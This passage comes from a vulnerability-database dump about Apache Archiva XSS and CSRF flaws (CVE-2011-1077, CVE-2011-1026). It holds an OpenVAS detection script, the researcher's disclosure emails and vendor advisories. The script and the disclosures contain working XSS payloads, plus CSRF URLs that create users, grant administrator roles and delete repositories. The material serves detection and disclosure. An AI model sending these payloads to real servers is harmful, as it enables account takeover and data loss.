"d1f7a427f76adb256a3178e5a00db6de", "key": "title"}, {"hash": "5b3e78bf2118fdcf240d0771f3c6039e", "key": "reporter"}, {"hash": "8d7239ed78f256629e274c8450cab5c7", "key": "sourceData"}, {"hash": "55199d25018fbdb9b50e6b64d444c3a4", "key": "naslFamily"}, {"hash": "47c1f692ea47a21f716dad07043ade01", "key": "type"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "64137e6fed32f9ab07b1dad6e3f1e5c7", "key": "href"}, {"hash": "4e7266e7f33e199ae4ae1c46ebd156e6", "key": "pluginID"}, {"hash": "5ec26d28aca48dd3c644d563fbdea9da", "key": "cvelist"}, {"hash": "ebc8d9125ff37cd02a5905ffb4940c9e", "key": "modified"}, {"hash": "a43a99f117e95746b14a6b68f70dd1f6", "key": "references"}, {"hash": "110dbfc9f4642aa516b7aad95ce24e92", "key": "published"}], "history": [], "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310801942", "id": "OPENVAS:1361412562310801942", "lastseen": "2018-08-30T19:27:41", "modified": "2017-09-18T00:00:00", "naslFamily": "Web application abuses", "objectVersion": "1.3", "pluginID": "1361412562310801942", "published": "2011-06-02T00:00:00", "references": ["http://archiva.apache.org/security.html", "http://packetstormsecurity.org/files/view/101797/apachearchivapoc-xss.txt"], "reporter": "Copyright (c) 2011 Greenbone Networks GmbH", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_archiva_multiple_vuln.nasl 7170 2017-09-18 10:35:33Z cfischer $\n#\n# Apache Archiva Multiple Vulnerabilities\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n################################################################################\n\nCPE = \"cpe:/a:apache:archiva\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801942\");\n script_version(\"$Revision: 7170 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-09-18 12:35:33 +0200 (Mon, 18 Sep 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-06-02 11:54:09 +0200 (Thu, 02 Jun 2011)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2011-1077\", \"CVE-2011-1026\");\n script_name(\"Apache Archiva Multiple Vulnerabilities\");\n script_xref(name : \"URL\" , value : \"http://archiva.apache.org/security.html\");\n script_xref(name : \"URL\" , value : \"http://packetstormsecurity.org/files/view/101797/apachearchivapoc-xss.txt\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_apache_archiva_detect.nasl\");\n script_mandatory_keys(\"apache_archiva/installed\");\n script_require_ports(\"Services/www\", 8080);\n script_tag(name : \"impact\" , value : \"Successful exploitation will allow remote attackers to inject arbitrary\nHTML codes, theft of cookie-based authentication credentials, arbitrary URL redirection, disclosure or\nmodification of sensitive data and phishing attacks.\n\nImpact Level: Application\");\n script_tag(name : \"affected\" , value : \"Apache Archiva version 1.3.4 and prior.\");\n script_tag(name : \"insight\" , value : \"Multiple flaws are due to insufficient input validation in the input\nfields throughout the application. Successful exploitation could allow an attacker to compromise the\napplication.\");\n script_tag(name : \"solution\" , value : \"Upgrade to Apache Archiva Version 1.3.5 or later.\");\n script_tag(name : \"summary\" , value : \"This host is running Apache Archiva and is prone to multiple\nvulnerabilities.\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!dir = get_app_location(cpe: CPE, port: port))\n exit(0);\n\nif (dir == \"/\")\n dir = \"\";\n\n## Try expliot and check response\nreq = http_get(item:string(dir, \"/admin/addLegacyArtifactPath!commit.action?\" +\n \"legacyArtifactPath.path=test<script>alert('XSS-TEST')<%2Fscri\" +\n \"pt>&groupId=test<script>alert('XSS-TEST')<%2Fscript>&artifact\" +\n \"Id=test<script>alert('XSS-TEST')<%2Fscript>&version=test<scri\" +\n \"pt>alert('XSS-TEST')<%2Fscript>&classifier=test<script>alert\" +\n \"('XSS-TEST')<%2Fscript>&type=test<script>alert('XSS-TEST')<%\" +\n \"2Fscript>\"), port:port);\n\nrcvRes = http_keepalive_send_recv(port:port, data:req);\n\n## Confirm the exploit\nif(rcvRes =~ \"HTTP/1\\.. 200\" && \"test<script>alert('XSS-TEST')</script>/test\" >< rcvRes){\n security_message(port);\n exit(0);\n}\n\nexit(0);\n", "title": "Apache Archiva Multiple Vulnerabilities", "type": "openvas", "viewCount": 0}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2018-08-30T19:27:41"}], "edition": 6, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cvelist", "hash": "5ec26d28aca48dd3c644d563fbdea9da"}, {"key": "cvss", "hash": "4cac367be6dd8242802053610be9dee6"}, {"key": "description", "hash": "7ae18b64588b79e46ec0a1db047527f1"}, {"key": "href", "hash": "64137e6fed32f9ab07b1dad6e3f1e5c7"}, {"key": "modified", "hash": "2c104a45bc8ee43625332611b190dc40"}, {"key": "naslFamily", "hash": "55199d25018fbdb9b50e6b64d444c3a4"}, {"key": "pluginID", "hash": "4e7266e7f33e199ae4ae1c46ebd156e6"}, {"key": "published", "hash": "110dbfc9f4642aa516b7aad95ce24e92"}, {"key": "references", "hash": "a43a99f117e95746b14a6b68f70dd1f6"}, {"key": "reporter", "hash": "5b3e78bf2118fdcf240d0771f3c6039e"}, {"key": "sourceData", "hash": "00c9ac7d63cb86cab87ea36f3f7df2fe"}, {"key": "title", "hash": "d1f7a427f76adb256a3178e5a00db6de"}, {"key": "type", "hash": "47c1f692ea47a21f716dad07043ade01"}], "hash": "8cefc8ebd9ad9b1ff52ef61f0895d6245de0d8649fdd56e55a9cd9ff3d9c2b5f", "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:26450", "SECURITYVULNS:DOC:26449", "SECURITYVULNS:DOC:26422", "SECURITYVULNS:DOC:26423", "SECURITYVULNS:VULN:11698"]}, {"type": "cve", "idList": ["CVE-2011-1077", "CVE-2011-1026"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:101797", "PACKETSTORM:101798", "PACKETSTORM:101748"]}, {"type": "nessus", "idList": ["ARCHIVA_1_3_5.NASL"]}, {"type": "seebug", "idList": ["SSV:20598"]}], "modified": "2019-05-29T18:39:52"}, "score": {"value": 6.9, "vector": "NONE", "modified": "2019-05-29T18:39:52"}, "vulnersScore": 6.9}, "objectVersion": "1.3", "sourceData": "##############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_archiva_multiple_vuln.nasl 11997 2018-10-20 11:59:41Z mmartin $\n#\n# Apache Archiva Multiple Vulnerabilities\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n################################################################################\n\nCPE = \"cpe:/a:apache:archiva\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.801942\");\n script_version(\"$Revision: 11997 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-20 13:59:41 +0200 (Sat, 20 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-06-02 11:54:09 +0200 (Thu, 02 Jun 2011)\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2011-1077\", \"CVE-2011-1026\");\n script_name(\"Apache Archiva Multiple Vulnerabilities\");\n script_xref(name:\"URL\", value:\"http://archiva.apache.org/security.html\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.org/files/view/101797/apachearchivapoc-xss.txt\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_apache_archiva_detect.nasl\");\n script_mandatory_keys(\"apache_archiva/installed\");\n script_require_ports(\"Services/www\", 8080);\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to inject arbitrary\nHTML codes, theft of cookie-based authentication credentials, arbitrary URL redirection, disclosure or\nmodification of sensitive data and phishing attacks.\");\n script_tag(name:\"affected\", value:\"Apache Archiva version 1.3.4 and prior.\");\n script_tag(name:\"insight\", value:\"Multiple flaws are due to insufficient input validation in the input\nfields throughout the application. Successful exploitation could allow an attacker to compromise the\napplication.\");\n script_tag(name:\"solution\", value:\"Upgrade to Apache Archiva Version 1.3.5 or later.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"This host is running Apache Archiva and is prone to multiple\nvulnerabilities.\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!dir = get_app_location(cpe: CPE, port: port))\n exit(0);\n\nif (dir == \"/\")\n dir = \"\";\n\nreq = http_get(item:string(dir, \"/admin/addLegacyArtifactPath!commit.action?\" +\n \"legacyArtifactPath.path=test<script>alert('XSS-TEST')<%2Fscri\" +\n \"pt>&groupId=test<script>alert('XSS-TEST')<%2Fscript>&artifact\" +\n \"Id=test<script>alert('XSS-TEST')<%2Fscript>&version=test<scri\" +\n \"pt>alert('XSS-TEST')<%2Fscript>&classifier=test<script>alert\" +\n \"('XSS-TEST')<%2Fscript>&type=test<script>alert('XSS-TEST')<%\" +\n \"2Fscript>\"), port:port);\n\nrcvRes = http_keepalive_send_recv(port:port, data:req);\n\nif(rcvRes =~ \"HTTP/1\\.. 200\" && \"test<script>alert('XSS-TEST')</script>/test\" >< rcvRes){\n security_message(port);\n exit(0);\n}\n\nexit(0);\n", "naslFamily": "Web application abuses", "pluginID": "1361412562310801942", "scheme": null}
{"securityvulns": [{"lastseen": "2018-08-31T11:10:40", "bulletinFamily": "software", "description": "Hi,\r\n\r\nThis is regarding multiple XSS (Cross Site Scripting) Vulnerabilities in\r\nApache Archiva 1.3.4 (and previous versions). The following is the\r\ndisclosure document\r\n\r\nProject: Apache Archiva\r\nSeverity: High\r\nVersions: 1.3.0 - 1.3.4. The unsupported versions Archiva 1.0 - 1.2.2\r\nare also affected.\r\nExploit type: Multiple XSS\r\nMitigation: Archiva 1.3.4 and earlier users should upgrade to 1.3.5\r\nVendor URL: http://archiva.apache.org/security.html\r\nCVE: CVE-ID-2011-1077\r\n--------------------------------------------------------------------\r\n\r\nTimeline:\r\n28 February 2011: Vendor Contacted\r\n1 March 2011: Vendor Response received. CVE-2011-1026 for CSRF Issues\r\nAssigned.\r\n7 March 2011: CVE-2011-1077 Assigned for XSS Issues.\r\n14 March 2011: Fixes released to selected channels / Found to be\r\ninsufficient\r\n27 May 2011: Vendor releases v1.3.5\r\n27 May 2011: Vendor releases security disclosure to Bugtraq and FD.\r\n30 May 2011: Exploit details released.\r\n--------------------------------------------------------------------\r\n\r\nProduct Description:\r\nApache Archiva is an extensible repository management software that\r\nhelps taking care of your own personal or enterprise-wide build artifact\r\nrepository. It is the perfect companion for build tools such as Maven,\r\nContinuum, and ANT.\r\n\r\nArchiva offers several capabilities, amongst which remote repository\r\nproxying, security access management, build artifact storage, delivery,\r\nbrowsing, indexing and usage reporting, extensible scanning\r\nfunctionality... and many more! \r\n(Source: http://archiva.apache.org/)\r\n--------------------------------------------------------------------\r\n\r\nVulnerability Details:\r\nUser can insert HTML or execute arbitrary JavaScript code within the\r\nvulnerable application. The vulnerabilities arise due to insufficient\r\ninput validation in multiple input fields throughout the application.\r\nSuccessful exploitation of these vulnerabilities could result in, but\r\nnot limited to, compromise of the application, theft of \r\ncookie-based authentication credentials, arbitrary url redirection,\r\ndisclosure or modification of sensitive data and phishing attacks.\r\n\r\n----------------------------------------------------------------------\r\n\r\nProof of Concept:\r\nReflected XSS:\r\nhttp://127.0.0.1:8080/archiva/security/useredit.action?username=test%3Cs\r\ncript%3Ealert%28%27xss%27%29%3C/script%3E\r\nhttp://127.0.0.1:8080/archiva/security/roleedit.action?name=%22%3E%3Cscr\r\nipt%3Ealert%28%27xss%27%29%3C%2Fscript%3E\r\nhttp://127.0.0.1:8080/archiva/security/userlist!show.action?roleName=tes\r\nt%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E\r\nhttp://127.0.0.1:8080/archiva/deleteArtifact!doDelete.action?groupId=1<s\r\ncript>alert('xss')</script>&artifactId=1<script>alert('xss')</script>&ve\r\nrsion=1&repositoryId=internal\r\nhttp://127.0.0.1:8080/archiva/admin/addLegacyArtifactPath!commit.action?\r\nlegacyArtifactPath.path=test%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript\r\n%3E&groupId=test%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&artifact\r\nId=test%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&version=test%3Csc\r\nript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&classifier=test%3Cscript%3Eal\r\nert%28%27xss%27%29%3C%2Fscript%3E&type=test%3Cscript%3Ealert%28%27xss%27\r\n%29%3C%2Fscript%3E\r\nhttp://127.0.0.1:8080/archiva/admin/deleteNetworkProxy!confirm.action?pr\r\noxyid=test%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E\r\n\r\n\r\nPersistant (Stored) XSS:\r\nExploit code: test<script>alert('xss')</script>\r\nhttp://127.0.0.1:8080/archiva/admin/addRepository.action\r\n(Identifier:repository.id, Name:repository.name,\r\nDirectory:repository.location, Index Directory:repository.indexDir)\r\nhttp://127.0.0.1:8080/archiva/admin/confirmDeleteRepository.action?repoi\r\nd=\r\n\r\nhttp://127.0.0.1:8080/archiva/admin/editAppearance.action\r\n(Name:organisationName, URL:organisation:URL, LogoURL:organisation:URL)\r\nhttp://127.0.0.1:8080/archiva/admin/configureAppearance.action\r\n\r\nhttp://127.0.0.1:8080/archiva/admin/addLegacyArtifactPath.action(Path:na\r\nme=legacyArtifactPath.path, GroupId:groupId, ArtifactId:artifactId,\r\nVersion:version, Classifier:classifier, Type:type)\r\nhttp://127.0.0.1:8080/archiva/admin/legacyArtifactPath.action\r\n\r\nhttp://127.0.0.1:8080/archiva/admin/addNetworkProxy.action\r\n(Identifier:proxy.id, Protocol:proxy.protocol, Hostname:proxy.host,\r\nPort:proxy.port, Username:proxy.username)\r\nhttp://127.0.0.1:8080/archiva/admin/networkProxies.action\r\n---------------------------------------------------------------------\r\n\r\nWarm Regards,\r\nRiyaz Ahemed Walikar || Senior Engineer - Professional Services\r\nVulnerability Assessment & Penetration Testing\r\nMobile: +91-98860-42242 || Extn: 5601\r\n\r\n\r\n\r\nThe information transmitted is intended only for the person or entity to which it is addressed and may contain\r\nconfidential and/or privileged material \r\nAny review, re-transmission, dissemination or other use of or taking of any action in reliance upon,this\r\ninformation by persons or entities other than the intended recipient is prohibited. \r\nIf you received this in error, please contact the sender and delete the material from your computer. \r\nMicroland takes all reasonable steps to ensure that its electronic communications are free from viruses. \r\nHowever, given Internet accessibility, the Company cannot accept liability for any virus introduced by this\r\ne-mail or any attachment and you are advised to use up-to-date virus checking software. \r\n", "modified": "2011-06-02T00:00:00", "published": "2011-06-02T00:00:00", "id": "SECURITYVULNS:DOC:26450", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:26450", "title": "[CVE-2011-1077] Apache Archiva Multiple XSS vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:40", "bulletinFamily": "software", "description": "Hi,\r\n\r\nThis is regarding multiple CSRF (Cross Site Request Forgery)\r\nVulnerabilities in Apache Archiva 1.3.4 (and previous versions). The\r\nfollowing is the disclosure document \r\n\r\nTitle: Multiple CSRF Vulnerabilities in Apache Archiva 1.3.4\r\n--------------------------------------------------------------------\r\n\r\nProject: Apache Archiva\r\nSeverity: High\r\nVersions: 1.3.0 - 1.3.4. The unsupported versions Archiva 1.0 - 1.2.2\r\nare also affected.\r\nExploit type: Multiple CSRF\r\nMitigation: Archiva 1.3.4 and earlier users should upgrade to 1.3.5\r\nVendor URL: http://archiva.apache.org/security.html\r\nCVE: CVE-ID-2011-1026\r\n--------------------------------------------------------------------\r\n\r\nTimeline:\r\n28 February 2011: Vendor Contacted\r\n1 March 2011: Vendor Response received. CVE-2011-1026 for CSRF Issues\r\nAssigned.\r\n7 March 2011: CVE-2011-1077 Assigned for XSS Issues.\r\n14 March 2011: Fixes released to selected channels / Found to be\r\ninsufficient\r\n27 May 2011: Vendor releases v1.3.5\r\n27 May 2011: Vendor releases security disclosure to Bugtraq and FD.\r\n30 May 2011: Exploit details released.\r\n--------------------------------------------------------------------\r\n\r\nProduct Description:\r\nApache Archiva is an extensible repository management software that\r\nhelps taking care of your own personal or enterprise-wide build artifact\r\nrepository. It is the perfect companion for build tools such as Maven,\r\nContinuum, and ANT.\r\n\r\nArchiva offers several capabilities, amongst which remote repository\r\nproxying, security access management, build artifact storage, delivery,\r\nbrowsing, indexing and usage reporting, extensible scanning\r\nfunctionality... and many more! \r\n(Source: http://archiva.apache.org/)\r\n--------------------------------------------------------------------\r\n\r\nVulnerability Details:\r\nThese issues allow an attacker to access and use the application with\r\nthe session of a logged on user. In this case if an administrative\r\naccount is exploited, total application compromise may be acheived.\r\nAn attacker can build a simple html page containing a hidden Image tag\r\n(eg: <img src=vulnurl width=0 height=0 />) and entice the administrator\r\nto access the page.\r\n---------------------------------------------------------------------\r\n\r\nProof of Concept: \r\nhttp://127.0.0.1:8080/archiva/security/usercreate!submit.action?user.use\r\nrname=tester123&user.fullName=test&user.email=test%40test.com&user.passw\r\nord=abc&user.confirmPassword=abc\r\nhttp://127.0.0.1:8080/archiva/security/userdelete!submit.action?username\r\n=test\r\nhttp://127.0.0.1:8080/archiva/security/addRolesToUser.action?principal=t\r\nest&addRolesButton=true&__checkbox_addNDSelectedRoles=Guest&__checkbox_a\r\nddNDSelectedRoles=Registered+User&addNDSelectedRoles=System+Administrato\r\nr&__checkbox_addNDSelectedRoles=System+Administrator&__checkbox_addNDSel\r\nectedRoles=User+Administrator&__checkbox_addNDSelectedRoles=Global+Repos\r\nitory+Manager&__checkbox_addNDSelectedRoles=Global+Repository+Observer&s\r\nubmitRolesButton=Submit\r\nhttp://127.0.0.1:8080/archiva/admin/deleteRepository.action?repoid=test&\r\nmethod%3AdeleteContents=Delete+Configuration+and+Contents\r\nhttp://127.0.0.1:8080/archiva/deleteArtifact!doDelete.action?groupId=1&a\r\nrtifactId=1&version=1&repositoryId=snapshots\r\nhttp://127.0.0.1:8080/archiva/admin/addRepositoryGroup.action?repository\r\nGroup.id=csrfgrp\r\nhttp://127.0.0.1:8080/archiva/admin/deleteRepositoryGroup.action?repoGro\r\nupId=test&method%3Adelete=Confirm\r\nhttp://127.0.0.1:8080/archiva/admin/disableProxyConnector!disable.action\r\n?target=maven2-repository.dev.java.net&source=internal\r\nhttp://127.0.0.1:8080/archiva/admin/deleteProxyConnector!delete.action?t\r\narget=maven2-repository.dev.java.net&source=snapshots\r\nhttp://127.0.0.1:8080/archiva/admin/deleteLegacyArtifactPath.action?path\r\n=jaxen%2Fjars%2Fjaxen-1.0-FCS-full.jar\r\nhttp://127.0.0.1:8080/archiva/admin/saveNetworkProxy.action?mode=add&pro\r\nxy.id=ntwrk&proxy.protocol=http&proxy.host=test&proxy.port=8080&proxy.us\r\nername=&proxy.password=\r\nhttp://127.0.0.1:8080/archiva/admin/deleteNetworkProxy!delete.action?pro\r\nxyid=myproxy\r\nhttp://127.0.0.1:8080/archiva/admin/repositoryScanning!addFiletypePatter\r\nn.action?pattern=**%2F*.rum&fileTypeId=artifacts\r\nhttp://127.0.0.1:8080/archiva/admin/repositoryScanning!removeFiletypePat\r\ntern.action?pattern=**%2F*.rum&fileTypeId=artifacts\r\nhttp://127.0.0.1:8080/archiva/admin/repositoryScanning!updateKnownConsum\r\ners.action?enabledKnownContentConsumers=auto-remove&enabledKnownContentC\r\nonsumers=auto-rename&enabledKnownContentConsumers=create-missing-checksu\r\nms&enabledKnownContentConsumers=index-content&enabledKnownContentConsume\r\nrs=metadata-updater&enabledKnownContentConsumers=repository-purge&enable\r\ndKnownContentConsumers=update-db-artifact&enabledKnownContentConsumers=v\r\nalidate-checksums\r\nhttp://127.0.0.1:8080/archiva/admin/database!updateUnprocessedConsumers.\r\naction?enabledUnprocessedConsumers=update-db-project\r\nhttp://127.0.0.1:8080/archiva/admin/database!updateCleanupConsumers.acti\r\non?enabledCleanupConsumers=not-present-remove-db-artifact&enabledCleanup\r\nConsumers=not-present-remove-db-project&enabledCleanupConsumers=not-pres\r\nent-remove-indexed\r\n\r\nWarm Regards,\r\nRiyaz Ahemed Walikar || Senior Engineer - Professional Services\r\nVulnerability Assessment & Penetration Testing\r\nMobile: +91-98860-42242 || Extn: 5601\r\n\r\n\r\nThe information transmitted is intended only for the person or entity to which it is addressed and may contain\r\nconfidential and/or privileged material \r\nAny review, re-transmission, dissemination or other use of or taking of any action in reliance upon,this\r\ninformation by persons or entities other than the intended recipient is prohibited. \r\nIf you received this in error, please contact the sender and delete the material from your computer. \r\nMicroland takes all reasonable steps to ensure that its electronic communications are free from viruses. \r\nHowever, given Internet accessibility, the Company cannot accept liability for any virus introduced by this\r\ne-mail or any attachment and you are advised to use up-to-date virus checking software. \r\n", "modified": "2011-06-02T00:00:00", "published": "2011-06-02T00:00:00", "id": "SECURITYVULNS:DOC:26449", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:26449", "title": "[CVE-2011-1026] Apache Archiva Multiple CSRF vulnerabilities", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:40", "bulletinFamily": "software", "description": "CVE-2011-1026: Apache Archiva Multiple CSRF vulnerability\r\n\r\nSeverity: High\r\n\r\nVendor:\r\nThe Apache Software Foundation\r\n\r\nVersions Affected:\r\nArchiva 1.3.0 - 1.3.4\r\nThe unsupported versions Archiva 1.0 - 1.2.2 are also affected.\r\n\r\nDescription:\r\nAn attacker can build a simple html page containing a hidden Image tag\r\n(eg:\u00a0<img src=vulnurl width=0 height=0 />) and entice the\u00a0administrator\r\nto access the page.\r\nMitigation:\r\nArchiva 1.3.4 and earlier users should upgrade to 1.3.5\r\n\r\nCredit:\r\nThis issue was discovered by Riyaz Ahemed Walikar of Microland Ltd., India\r\n\r\nReferences:\r\nhttp://archiva.apache.org/security.html\r\n\r\nThanks,\r\nThe Apache Archiva Team", "modified": "2011-05-30T00:00:00", "published": "2011-05-30T00:00:00", "id": "SECURITYVULNS:DOC:26423", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:26423", "title": "[SECURITY] CVE-2011-1026: Apache Archiva Multiple CSRF vulnerability", "type": "securityvulns", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:10:40", "bulletinFamily": "software", "description": "CVE-2011-1077: Apache Archiva Multiple XSS vulnerability\r\n\r\nSeverity: High\r\n\r\nVendor:\r\nThe Apache Software Foundation\r\n\r\nVersions Affected:\r\nArchiva 1.3.0 - 1.3.4\r\nThe unsupported versions Archiva 1.0 - 1.2.2 are also affected.\r\n\r\nDescription:\r\nThe multiple XSS issues found are both Stored (Persistent) and\r\nReflected (Non-Persistent). Javascript which might contain malicious\r\ncode can be appended in a request parameter or stored as a value in a\r\nsubmitted form, and get executed.\r\n\r\nMitigation:\r\nArchiva 1.3.4 and earlier users should upgrade to 1.3.5\r\n\r\nCredit:\r\nThis issue was discovered by Riyaz Ahemed Walikar of Microland Ltd., India\r\n\r\nReferences:\r\nhttp://archiva.apache.org/security.html\r\n\r\nThanks,\r\nThe Apache Archiva Team", "modified": "2011-05-30T00:00:00", "published": "2011-05-30T00:00:00", "id": "SECURITYVULNS:DOC:26422", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:26422", "title": "[SECURITY] CVE-2011-1077: Apache Archiva Multiple XSS vulnerability", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:09:42", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2011-06-02T00:00:00", "published": "2011-06-02T00:00:00", "id": "SECURITYVULNS:VULN:11698", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:11698", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "cve": [{"lastseen": "2019-05-29T18:11:07", "bulletinFamily": "NVD", "description": "Multiple cross-site scripting (XSS) vulnerabilities in Apache Archiva 1.0 through 1.2.2, and 1.3.x before 1.3.5, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.", "modified": "2018-10-09T19:30:00", "id": "CVE-2011-1077", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1077", "published": "2011-06-02T20:55:00", "title": "CVE-2011-1077", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:11:07", "bulletinFamily": "NVD", "description": "Multiple cross-site request forgery (CSRF) vulnerabilities in Apache Archiva 1.0 through 1.2.2, and 1.3.x before 1.3.5, allow remote attackers to hijack the authentication of administrators.", "modified": "2018-10-09T19:30:00", "id": "CVE-2011-1026", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1026", "published": "2011-06-02T20:55:00", "title": "CVE-2011-1026", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:20:03", "bulletinFamily": "exploit", "description": "", "modified": "2011-05-30T00:00:00", "published": "2011-05-30T00:00:00", "href": "https://packetstormsecurity.com/files/101797/Apache-Archiva-1.3.4-Cross-Site-Scripting.html", "id": "PACKETSTORM:101797", "type": "packetstorm", "title": "Apache Archiva 1.3.4 Cross Site Scripting", "sourceData": "`Hi, \n \nThis is regarding multiple XSS (Cross Site Scripting) Vulnerabilities in \nApache Archiva 1.3.4 (and previous versions). The following is the \ndisclosure document \n \nProject: Apache Archiva \nSeverity: High \nVersions: 1.3.0 - 1.3.4. The unsupported versions Archiva 1.0 - 1.2.2 \nare also affected. \nExploit type: Multiple XSS \nMitigation: Archiva 1.3.4 and earlier users should upgrade to 1.3.5 \nVendor URL: http://archiva.apache.org/security.html \nCVE: CVE-ID-2011-1077 \n-------------------------------------------------------------------- \n \nTimeline: \n28 February 2011: Vendor Contacted \n1 March 2011: Vendor Response received. CVE-2011-1026 for CSRF Issues \nAssigned. \n7 March 2011: CVE-2011-1077 Assigned for XSS Issues. \n14 March 2011: Fixes released to selected channels / Found to be \ninsufficient \n27 May 2011: Vendor releases v1.3.5 \n27 May 2011: Vendor releases security disclosure to Bugtraq and FD. \n30 May 2011: Exploit details released. \n-------------------------------------------------------------------- \n \nProduct Description: \nApache Archiva is an extensible repository management software that \nhelps taking care of your own personal or enterprise-wide build artifact \nrepository. It is the perfect companion for build tools such as Maven, \nContinuum, and ANT. \n \nArchiva offers several capabilities, amongst which remote repository \nproxying, security access management, build artifact storage, delivery, \nbrowsing, indexing and usage reporting, extensible scanning \nfunctionality... and many more! \n(Source: http://archiva.apache.org/) \n-------------------------------------------------------------------- \n \nVulnerability Details: \nUser can insert HTML or execute arbitrary JavaScript code within the \nvulnerable application. The vulnerabilities arise due to insufficient \ninput validation in multiple input fields throughout the application. \nSuccessful exploitation of these vulnerabilities could result in, but \nnot limited to, compromise of the application, theft of \ncookie-based authentication credentials, arbitrary url redirection, 